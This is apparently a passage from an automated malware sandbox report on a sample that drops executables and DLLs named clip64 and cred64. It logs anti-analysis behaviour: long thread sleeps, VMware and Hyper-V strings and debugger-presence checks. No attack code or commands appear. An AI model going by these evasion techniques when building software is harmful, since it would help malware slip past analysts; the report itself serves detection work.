Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 8.6 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep time: -1470000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 5504 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 3940 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00440EAD FindFirstFileExW, 4_2_00440EAD
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04911114 FindFirstFileExW, 4_2_04911114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00440EAD FindFirstFileExW, 24_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04901114 FindFirstFileExW, 24_2_04901114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00440EAD FindFirstFileExW, 36_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04951114 FindFirstFileExW, 36_2_04951114
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 4_2_00408180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_6e74f07959bc23e75a6b77fd2553fb68ad4fabc_8822d4be_17748468-aec6-4998-b810-796a4d1a1ad0\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_c54a861aa4c43cc515c4d65c89eab2e3bda7e7c7_8822d4be_d2b7794f-7375-472a-8406-f114c8994e3a\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50717000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWdWndClass
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50783000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\3
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00439DBE
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0042F2A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0042F2A9
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 4_2_0043D5A2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043983B mov eax, dword ptr fs:[00000030h] 4_2_0043983B
